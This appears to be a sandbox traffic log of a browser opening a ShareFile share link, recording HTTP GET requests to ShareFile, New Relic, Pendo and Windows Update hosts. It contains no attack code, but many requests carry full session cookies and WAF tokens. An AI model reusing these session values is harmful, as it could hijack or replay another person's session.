AWSALB=QhHeoWsQYPicCcN/s3qNcaDnpcsoQR+FQN37DB5tY3NnMmjPqlV+MtvLsxv7vnXVkxWLeY6xxmTRJJW8FWTYYbIgeqrSpKAUSAyJtcCJ72+6Ba5oVzpitSdCSZqM; AWSALBCORS=QhHeoWsQYPicCcN/s3qNcaDnpcsoQR+FQN37DB5tY3NnMmjPqlV+MtvLsxv7vnXVkxWLeY6xxmTRJJW8FWTYYbIgeqrSpKAUSAyJtcCJ72+6Ba5oVzpitSdCSZqM
Source: global trafficHTTP traffic detected: GET /manifest.json HTTP/1.1Host: averellharriman.sharefile.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: manifestReferer: https://averellharriman.sharefile.com/share/view/s3b96c17360cd43e7bdcaf25a23709fd0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /nr-spa-1216.min.js HTTP/1.1Host: js-agent.newrelic.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /1/fd14b65b5e?a=594432325&sa=1&v=1216.487a282&t=Unnamed%20Transaction&rst=30200&ck=1&ref=https://averellharriman.sharefile.com/share/view/s3b96c17360cd43e7bdcaf25a23709fd0&be=1223&fe=29207&dc=4653&af=err,xhr,stn,ins,spa&perf=%7B%22timing%22:%7B%22of%22:1730835358296,%22n%22:0,%22f%22:3,%22dn%22:46,%22dne%22:61,%22c%22:61,%22s%22:61,%22ce%22:897,%22rq%22:897,%22rp%22:1193,%22rpe%22:1366,%22dl%22:1198,%22di%22:4565,%22ds%22:4652,%22de%22:4653,%22dc%22:29206,%22l%22:29206,%22le%22:29209%7D,%22navigation%22:%7B%7D%7D&fp=1888&fcp=2388&jsonp=NREUM.setToken HTTP/1.1Host: bam.nr-data.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sf/v3/Accounts/Branding HTTP/1.1Host: averellharriman.sf-api.comConnection: keep-aliveCorrelationId: cAUXre54daziARhMvPEN4Qsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept-Language: ensec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36X-SF-ClientCapabilities: HardLock,HardQuota,AthenaSSOAccept: application/json, text/plain, */*X-SF-App: ShareFileWebsec-ch-ua-platform: "Windows"Origin: https://averellharriman.sharefile.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brCookie: AWSALBTGCORS=2t37hBmHH/xUAMD8VhpSDaQs2iwkYt2pKv0hUomxpoPqoPBJw7lpCG60YyfMDsCCFyVZdKCfZCR6ftPASA5iIwfD1X/nXXdlG3FbVXcK7GNVFNl1uA84JUDHrXkW8mXhYdEmnbW4X/Lx6VG33ifCuRoYokKk3FQZPj5VwzjEw+Ef; AWSALBCORS=CmbaTwmXViZUaPBJPCFu4AzHeJDmpzA22LxmxNBw22a1HgAWTJd2PttFHwa07OLWVYJB/LSY3gNBVravXAv/t6Lxmx4aGPYTQaKUQSZKhAGcaqrnp121745wtpcm
Source: global trafficHTTP traffic detected: GET /favicon-32x32.png HTTP/1.1Host: averellharriman.sharefile.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=12bf9751-a126-42d5-b058-d35b3aa4244a:EQoAaZmJtjsOAAAA:xkRlisV0689T1jmvmwxmHz1sL5bM9WuSH+rXjwIhYR6qWw8NOhKgLCAPwLqt3fSbjbgzgiuAzKyX+7tSjbgWy24fIVvWGKKVog/+rLdDfPIayaMdLeaL6NEQuqyWfw/X+DnrbYz2hDGC1qgD5K5iPzaEZItkrAqmwwXiRdNnu7sXB9o3SJvUp3LqL1wYSgbzBvTAdqCN7z9gMzoyf8kueXXkIR64a3F4jv5RXcYMHWZnKKDQIuWzdON6LYN/BO2IFkI/BfWa; AWSALBTG=iKTi1cjAhq7ITp9PlkuKSxLqGMR2xyovmRD7tMf961keG8e1ONsRecTDM6HjEorTlPlHkyupH/c/epTQaOK4BgFGZdwb6Y60RZ7xoL9lEXM3AWs6E17N8hZE7AzRNHMb0NiMwotFyE8EUyT2vgC8EehPRTfkLk+Msrbd5c7xxhO3; AWSALBTGCORS=iKTi1cjAhq7ITp9PlkuKSxLqGMR2xyovmRD7tMf961keG8e1ONsRecTDM6HjEorTlPlHkyupH/c/epTQaOK4BgFGZdwb6Y60RZ7xoL9lEXM3AWs6E17N8hZE7AzRNHMb0NiMwotFyE8EUyT2vgC8EehPRTfkLk+Msrbd5c7xxhO3; AWSALB=1y44zkMuJqq+/KvVdxdxugljIs8J/ldk0zH1x0IBX8QdiNv774gKMhTODWSyy34ILTEGl11Gg5BQAK+Mt8FueKcntilAdjQNdp6RpINBsZEbPjINAyvzqk/N87v5; AWSALBCORS=1y44zkMuJqq+/KvVdxdxugljIs8J/ldk0zH1x0IBX8QdiNv774gKMhTODWSyy34ILTEGl11Gg5BQAK+Mt8FueKcntilAdjQNdp6RpINBsZEbPjINAyvzqk/N87v5
Source: global trafficHTTP traffic detected: GET /android-chrome-192x192.png HTTP/1.1Host: averellharriman.sharefile.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://averellharriman.sharefile.com/share/view/s3b96c17360cd43e7bdcaf25a23709fd0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=12bf9751-a126-42d5-b058-d35b3aa4244a:EQoAaZmJtjsOAAAA:xkRlisV0689T1jmvmwxmHz1sL5bM9WuSH+rXjwIhYR6qWw8NOhKgLCAPwLqt3fSbjbgzgiuAzKyX+7tSjbgWy24fIVvWGKKVog/+rLdDfPIayaMdLeaL6NEQuqyWfw/X+DnrbYz2hDGC1qgD5K5iPzaEZItkrAqmwwXiRdNnu7sXB9o3SJvUp3LqL1wYSgbzBvTAdqCN7z9gMzoyf8kueXXkIR64a3F4jv5RXcYMHWZnKKDQIuWzdON6LYN/BO2IFkI/BfWa; AWSALBTG=iKTi1cjAhq7ITp9PlkuKSxLqGMR2xyovmRD7tMf961keG8e1ONsRecTDM6HjEorTlPlHkyupH/c/epTQaOK4BgFGZdwb6Y60RZ7xoL9lEXM3AWs6E17N8hZE7AzRNHMb0NiMwotFyE8EUyT2vgC8EehPRTfkLk+Msrbd5c7xxhO3; AWSALBTGCORS=iKTi1cjAhq7ITp9PlkuKSxLqGMR2xyovmRD7tMf961keG8e1ONsRecTDM6HjEorTlPlHkyupH/c/epTQaOK4BgFGZdwb6Y60RZ7xoL9lEXM3AWs6E17N8hZE7AzRNHMb0NiMwotFyE8EUyT2vgC8EehPRTfkLk+Msrbd5c7xxhO3; AWSALB=1y44zkMuJqq+/KvVdxdxugljIs8J/ldk0zH1x0IBX8QdiNv774gKMhTODWSyy34ILTEGl11Gg5BQAK+Mt8FueKcntilAdjQNdp6RpINBsZEbPjINAyvzqk/N87v5; AWSALBCORS=1y44zkMuJqq+/KvVdxdxugljIs8J/ldk0zH1x0IBX8QdiNv774gKMhTODWSyy34ILTEGl11Gg5BQAK+Mt8FueKcntilAdjQNdp6RpINBsZEbPjINAyvzqk/N87v5
Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=z4zFrrzf2way3o4&MD=RMe6SWZc HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /1/fd14b65b5e?a=594432325&sa=1&v=1216.487a282&t=Unnamed%20Transaction&rst=30200&ck=1&ref=https://averellharriman.sharefile.com/share/view/s3b96c17360cd43e7bdcaf25a23709fd0&be=1223&fe=29207&dc=4653&af=err,xhr,stn,ins,spa&perf=%7B%22timing%22:%7B%22of%22:1730835358296,%22n%22:0,%22f%22:3,%22dn%22:46,%22dne%22:61,%22c%22:61,%22s%22:61,%22ce%22:897,%22rq%22:897,%22rp%22:1193,%22rpe%22:1366,%22dl%22:1198,%22di%22:4565,%22ds%22:4652,%22de%22:4653,%22dc%22:29206,%22l%22:29206,%22le%22:29209%7D,%22navigation%22:%7B%7D%7D&fp=1888&fcp=2388&jsonp=NREUM.setToken HTTP/1.1Host: bam.nr-data.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: JSESSIONID=e768e1339f16edbe
Source: global trafficHTTP traffic detected: GET /bundles/3aa33bb6fffd83a61c47.svg HTTP/1.1Host: averellharriman.sharefile.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://averellharriman.sharefile.com/share/view/s3b96c17360cd43e7bdcaf25a23709fd0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=12bf9751-a126-42d5-b058-d35b3aa4244a:EQoAaZmJtjsOAAAA:xkRlisV0689T1jmvmwxmHz1sL5bM9WuSH+rXjwIhYR6qWw8NOhKgLCAPwLqt3fSbjbgzgiuAzKyX+7tSjbgWy24fIVvWGKKVog/+rLdDfPIayaMdLeaL6NEQuqyWfw/X+DnrbYz2hDGC1qgD5K5iPzaEZItkrAqmwwXiRdNnu7sXB9o3SJvUp3LqL1wYSgbzBvTAdqCN7z9gMzoyf8kueXXkIR64a3F4jv5RXcYMHWZnKKDQIuWzdON6LYN/BO2IFkI/BfWa; AWSALBTG=VX1ttsAPDjLVr6wBNWUyfctYBeZn0YD0/CIA5gt3/C+2TQf0kgnSbBZKQ5L47SqoCpveGvkoAHMnrSo/u86HveQ8Tn0TdxUdKeJGpQdyetTnlbeExQdPJthsJyzDdJLONAivAAuoFnMMg0n2ZhsLiZ45TUTQiiQMO6O9HtAyctgo; AWSALBTGCORS=VX1ttsAPDjLVr6wBNWUyfctYBeZn0YD0/CIA5gt3/C+2TQf0kgnSbBZKQ5L47SqoCpveGvkoAHMnrSo/u86HveQ8Tn0TdxUdKeJGpQdyetTnlbeExQdPJthsJyzDdJLONAivAAuoFnMMg0n2ZhsLiZ45TUTQiiQMO6O9HtAyctgo; AWSALB=GSbnfFcQ14IpIip97y8BDpI0O9tLJs4yDEm1gf2nQr4mD7vS6sEUH9nILecWWzUrAqrDrnoq7ohleODIIZAyuRUjR8b64imlGDe2hUNlMM6XWMnP/eZmJaa0asp5; AWSALBCORS=GSbnfFcQ14IpIip97y8BDpI0O9tLJs4yDEm1gf2nQr4mD7vS6sEUH9nILecWWzUrAqrDrnoq7ohleODIIZAyuRUjR8b64imlGDe2hUNlMM6XWMnP/eZmJaa0asp5
Source: global trafficHTTP traffic detected: GET /bundles/b79627b64df3ab63890d.js HTTP/1.1Host: averellharriman.sharefile.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://averellharriman.sharefile.com/share/view/s3b96c17360cd43e7bdcaf25a23709fd0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=12bf9751-a126-42d5-b058-d35b3aa4244a:EQoAaZmJtjsOAAAA:xkRlisV0689T1jmvmwxmHz1sL5bM9WuSH+rXjwIhYR6qWw8NOhKgLCAPwLqt3fSbjbgzgiuAzKyX+7tSjbgWy24fIVvWGKKVog/+rLdDfPIayaMdLeaL6NEQuqyWfw/X+DnrbYz2hDGC1qgD5K5iPzaEZItkrAqmwwXiRdNnu7sXB9o3SJvUp3LqL1wYSgbzBvTAdqCN7z9gMzoyf8kueXXkIR64a3F4jv5RXcYMHWZnKKDQIuWzdON6LYN/BO2IFkI/BfWa; AWSALBTG=VX1ttsAPDjLVr6wBNWUyfctYBeZn0YD0/CIA5gt3/C+2TQf0kgnSbBZKQ5L47SqoCpveGvkoAHMnrSo/u86HveQ8Tn0TdxUdKeJGpQdyetTnlbeExQdPJthsJyzDdJLONAivAAuoFnMMg0n2ZhsLiZ45TUTQiiQMO6O9HtAyctgo; AWSALBTGCORS=VX1ttsAPDjLVr6wBNWUyfctYBeZn0YD0/CIA5gt3/C+2TQf0kgnSbBZKQ5L47SqoCpveGvkoAHMnrSo/u86HveQ8Tn0TdxUdKeJGpQdyetTnlbeExQdPJthsJyzDdJLONAivAAuoFnMMg0n2ZhsLiZ45TUTQiiQMO6O9HtAyctgo; AWSALB=GSbnfFcQ14IpIip97y8BDpI0O9tLJs4yDEm1gf2nQr4mD7vS6sEUH9nILecWWzUrAqrDrnoq7ohleODIIZAyuRUjR8b64imlGDe2hUNlMM6XWMnP/eZmJaa0asp5; AWSALBCORS=GSbnfFcQ14IpIip97y8BDpI0O9tLJs4yDEm1gf2nQr4mD7vS6sEUH9nILecWWzUrAqrDrnoq7ohleODIIZAyuRUjR8b64imlGDe2hUNlMM6XWMnP/eZmJaa0asp5
Source: global trafficHTTP traffic detected: GET /data/guide.json/74b07336-7560-45fc-7cd1-95032a784d52?id=12&jzb=eJyNUM2K2zAQfhedY1uW_BP71pIeetjdQtrCphQzlsaJQJYcWc5Slrx7xjmk9LL0Nhp9v_POLmY20YevmrWs-_bleffSfe9ez_n589Oh2fMD2zBQyi8u3iEgqm2leZGUCH2ih3pIyoqLRCnZ5LroBcotUZZgCXyKcZrbLIMLBrT2BCGYEVw604SDsZgqP2b3V3Yx-JbNsm8qldey4koXEuteKxhECULWvBk0J2lv9c-_md1i7YaNGEFDBNY-Cq2j-aCUBXdc4IiEQNf92LPro-hKhWna-RGMo_9_4hL1LvufhxgQ4hJwZu0v5mVV0gqdCn-miBpJ37LfZDyRgYufHva0ojprNl5meZ4JLgpi0hln49dIIhWlTPNuCl6z6_UG5AqPbQ&v=2.253.1_prod&ct=1730835389612 HTTP/1.1Host: citrix-sharefile-data.customer.pendo.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://averellharriman.sharefile.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /data/guide.gif/74b07336-7560-45fc-7cd1-95032a784d52?jzb=eJwFwIEIAAAAwDDQd3-N1QABFQC5&ct=1730835389613&v=2.253.1_prod HTTP/1.1Host: citrix-sharefile-data.customer.pendo.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://averellharriman.sharefile.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /android-chrome-192x192.png HTTP/1.1Host: averellharriman.sharefile.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=12bf9751-a126-42d5-b058-d35b3aa4244a:EQoAaZmJtjsOAAAA:xkRlisV0689T1jmvmwxmHz1sL5bM9WuSH+rXjwIhYR6qWw8NOhKgLCAPwLqt3fSbjbgzgiuAzKyX+7tSjbgWy24fIVvWGKKVog/+rLdDfPIayaMdLeaL6NEQuqyWfw/X+DnrbYz2hDGC1qgD5K5iPzaEZItkrAqmwwXiRdNnu7sXB9o3SJvUp3LqL1wYSgbzBvTAdqCN7z9gMzoyf8kueXXkIR64a3F4jv5RXcYMHWZnKKDQIuWzdON6LYN/BO2IFkI/BfWa; AWSALBTG=VX1ttsAPDjLVr6wBNWUyfctYBeZn0YD0/CIA5gt3/C+2TQf0kgnSbBZKQ5L47SqoCpveGvkoAHMnrSo/u86HveQ8Tn0TdxUdKeJGpQdyetTnlbeExQdPJthsJyzDdJLONAivAAuoFnMMg0n2ZhsLiZ45TUTQiiQMO6O9HtAyctgo; AWSALBTGCORS=VX1ttsAPDjLVr6wBNWUyfctYBeZn0YD0/CIA5gt3/C+2TQf0kgnSbBZKQ5L47SqoCpveGvkoAHMnrSo/u86HveQ8Tn0TdxUdKeJGpQdyetTnlbeExQdPJthsJyzDdJLONAivAAuoFnMMg0n2ZhsLiZ45TUTQiiQMO6O9HtAyctgo; AWSALB=GSbnfFcQ14IpIip97y8BDpI0O9tLJs4yDEm1gf2nQr4mD7vS6sEUH9nILecWWzUrAqrDrnoq7ohleODIIZAyuRUjR8b64imlGDe2hUNlMM6XWMnP/eZmJaa0asp5; AWSALBCORS=GSbnfFcQ14IpIip97y8BDpI0O9tLJs4yDEm1gf2nQr4mD7vS6sEUH9nILecWWzUrAqrDrnoq7ohleODIIZAyuRUjR8b64imlGDe2hUNlMM6XWMnP/eZmJaa0asp5
Source: global trafficHTTP traffic detected: GET /bundles/1c992ae0c14e95098d9a.js HTTP/1.1Host: averellharriman.sharefile.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://averellharriman.sharefile.com/share/view/s3b96c17360cd43e7bdcaf25a23709fd0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=12bf9751-a126-42d5-b058-d35b3aa4244a:EQoAaZmJtjsOAAAA:xkRlisV0689T1jmvmwxmHz1sL5bM9WuSH+rXjwIhYR6qWw8NOhKgLCAPwLqt3fSbjbgzgiuAzKyX+7tSjbgWy24fIVvWGKKVog/+rLdDfPIayaMdLeaL6NEQuqyWfw/X+DnrbYz2hDGC1qgD5K5iPzaEZItkrAqmwwXiRdNnu7sXB9o3SJvUp3LqL1wYSgbzBvTAdqCN7z9gMzoyf8kueXXkIR64a3F4jv5RXcYMHWZnKKDQIuWzdON6LYN/BO2IFkI/BfWa; AWSALBTG=VX1ttsAPDjLVr6wBNWUyfctYBeZn0YD0/CIA5gt3/C+2TQf0kgnSbBZKQ5L47SqoCpveGvkoAHMnrSo/u86HveQ8Tn0TdxUdKeJGpQdyetTnlbeExQdPJthsJyzDdJLONAivAAuoFnMMg0n2ZhsLiZ45TUTQiiQMO6O9HtAyctgo; AWSALBTGCORS=VX1ttsAPDjLVr6wBNWUyfctYBeZn0YD0/CIA5gt3/C+2TQf0kgnSbBZKQ5L47SqoCpveGvkoAHMnrSo/u86HveQ8Tn0TdxUdKeJGpQdyetTnlbeExQdPJthsJyzDdJLONAivAAuoFnMMg0n2ZhsLiZ45TUTQiiQMO6O9HtAyctgo; AWSALB=GSbnfFcQ14IpIip97y8BDpI0O9tLJs4yDEm1gf2nQr4mD7vS6sEUH9nILecWWzUrAqrDrnoq7ohleODIIZAyuRUjR8b64imlGDe2hUNlMM6XWMnP/eZmJaa0asp5; AWSALBCORS=GSbnfFcQ14IpIip97y8BDpI0O9tLJs4yDEm1gf2nQr4mD7vS6sEUH9nILecWWzUrAqrDrnoq7ohleODIIZAyuRUjR8b64imlGDe2hUNlMM6XWMnP/eZmJaa0asp5
Source: global trafficHTTP traffic detected: GET /bundles/4229061ac836f0f16eea.js HTTP/1.1Host: averellharriman.sharefile.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://averellharriman.sharefile.com/share/view/s3b96c17360cd43e7bdcaf25a23709fd0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=12bf9751-a126-42d5-b058-d35b3aa4244a:EQoAaZmJtjsOAAAA:xkRlisV0689T1jmvmwxmHz1sL5bM9WuSH+rXjwIhYR6qWw8NOhKgLCAPwLqt3fSbjbgzgiuAzKyX+7tSjbgWy24fIVvWGKKVog/+rLdDfPIayaMdLeaL6NEQuqyWfw/X+DnrbYz2hDGC1qgD5K5iPzaEZItkrAqmwwXiRdNnu7sXB9o3SJvUp3LqL1wYSgbzBvTAdqCN7z9gMzoyf8kueXXkIR64a3F4jv5RXcYMHWZnKKDQIuWzdON6LYN/BO2IFkI/BfWa; AWSALBTG=VX1ttsAPDjLVr6wBNWUyfctYBeZn0YD0/CIA5gt3/C+2TQf0kgnSbBZKQ5L47SqoCpveGvkoAHMnrSo/u86HveQ8Tn0TdxUdKeJGpQdyetTnlbeExQdPJthsJyzDdJLONAivAAuoFnMMg0n2ZhsLiZ45TUTQiiQMO6O9HtAyctgo; AWSALBTGCORS=VX1ttsAPDjLVr6wBNWUyfctYBeZn0YD0/CIA5gt3/C+2TQf0kgnSbBZKQ5L47SqoCpveGvkoAHMnrSo/u86HveQ8Tn0TdxUdKeJGpQdyetTnlbeExQdPJthsJyzDdJLONAivAAuoFnMMg0n2ZhsLiZ45TUTQiiQMO6O9HtAyctgo; AWSALB=GSbnfFcQ14IpIip97y8BDpI0O9tLJs4yDEm1gf2nQr4mD7vS6sEUH9nILecWWzUrAqrDrnoq7ohleODIIZAyuRUjR8b64imlGDe2hUNlMM6XWMnP/eZmJaa0asp5; AWSALBCORS=GSbnfFcQ14IpIip97y8BDpI0O9tLJs4yDEm1gf2nQr4mD7vS6sEUH9nILecWWzUrAqrDrnoq7ohleODIIZAyuRUjR8b64imlGDe2hUNlMM6XWMnP/eZmJaa0asp5
Source: global trafficHTTP traffic detected: GET /bundles/5be3ba1b444ac539eaf5.js HTTP/1.1Host: averellharriman.sharefile.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://averellharriman.sharefile.com/share/view/s3b96c17360cd43e7bdcaf25a23709fd0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=12bf9751-a126-42d5-b058-d35b3aa4244a:EQoAaZmJtjsOAAAA:xkRlisV0689T1jmvmwxmHz1sL5bM9WuSH+rXjwIhYR6qWw8NOhKgLCAPwLqt3fSbjbgzgiuAzKyX+7tSjbgWy24fIVvWGKKVog/+rLdDfPIayaMdLeaL6NEQuqyWfw/X+DnrbYz2hDGC1qgD5K5iPzaEZItkrAqmwwXiRdNnu7sXB9o3SJvUp3LqL1wYSgbzBvTAdqCN7z9gMzoyf8kueXXkIR64a3F4jv5RXcYMHWZnKKDQIuWzdON6LYN/BO2IFkI/BfWa; AWSALBTG=VX1ttsAPDjLVr6wBNWUyfctYBeZn0YD0/CIA5gt3/C+2TQf0kgnSbBZKQ5L47SqoCpveGvkoAHMnrSo/u86HveQ8Tn0TdxUdKeJGpQdyetTnlbeExQdPJthsJyzDdJLONAivAAuoFnMMg0n2ZhsLiZ45TUTQiiQMO6O9HtAyctgo; AWSALBTGCORS=VX1ttsAPDjLVr6wBNWUyfctYBeZn0YD0/CIA5gt3/C+2TQf0kgnSbBZKQ5L47SqoCpveGvkoAHMnrSo/u86HveQ8Tn0TdxUdKeJGpQdyetTnlbeExQdPJthsJyzDdJLONAivAAuoFnMMg0n2ZhsLiZ45TUTQiiQMO6O9HtAyctgo; AWSALB=GSbnfFcQ14IpIip97y8BDpI0O9tLJs4yDEm1gf2nQr4mD7vS6sEUH9nILecWWzUrAqrDrnoq7ohleODIIZAyuRUjR8b64imlGDe2hUNlMM6XWMnP/eZmJaa0asp5; AWSALBCORS=GSbnfFcQ14IpIip97y8BDpI0O9tLJs4yDEm1gf2nQr4mD7vS6sEUH9nILecWWzUrAqrDrnoq7ohleODIIZAyuRUjR8b64imlGDe2hUNlMM6XWMnP/eZmJaa0asp5
Source: global trafficHTTP traffic detected: GET /sf/v3/Accounts/Branding HTTP/1.1Host: averellharriman.sf-api.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AWSALBTG=2t37hBmHH/xUAMD8VhpSDaQs2iwkYt2pKv0hUomxpoPqoPBJw7lpCG60YyfMDsCCFyVZdKCfZCR6ftPASA5iIwfD1X/nXXdlG3FbVXcK7GNVFNl1uA84JUDHrXkW8mXhYdEmnbW4X/Lx6VG33ifCuRoYokKk3FQZPj5VwzjEw+Ef; AWSALB=CmbaTwmXViZUaPBJPCFu4AzHeJDmpzA22LxmxNBw22a1HgAWTJd2PttFHwa07OLWVYJB/LSY3gNBVravXAv/t6Lxmx4aGPYTQaKUQSZKhAGcaqrnp121745wtpcm; AWSALBTGCORS=VRFlrSq4Ahm1u6cdLaQnkh9gffnBdKgf3hYcGuYRzeM+Ux/d5PaKN1QZiLa8mO/tfMkrMwAjJFNDuBV6n7VDXH4gaDVUt3AbI0MMje3+KHRTg6o9nj+EXttKjWIsv0gUR3r8AL+zphJ7RiPMcjIuwJCyaCLjNSz4NKS+FT9N0mph; AWSALBCORS=xh82sqVdczCASQ7aPKgsBMQ5vkqSyu6w8wlHXr4I0/Z2OuOdGyUzf0ux4z+LUPBiHGgF0K5rFItA90ft3Ttmz1r6sWARtNus+trfLzZwLYO3jtyvSWD4zSq1bNZk
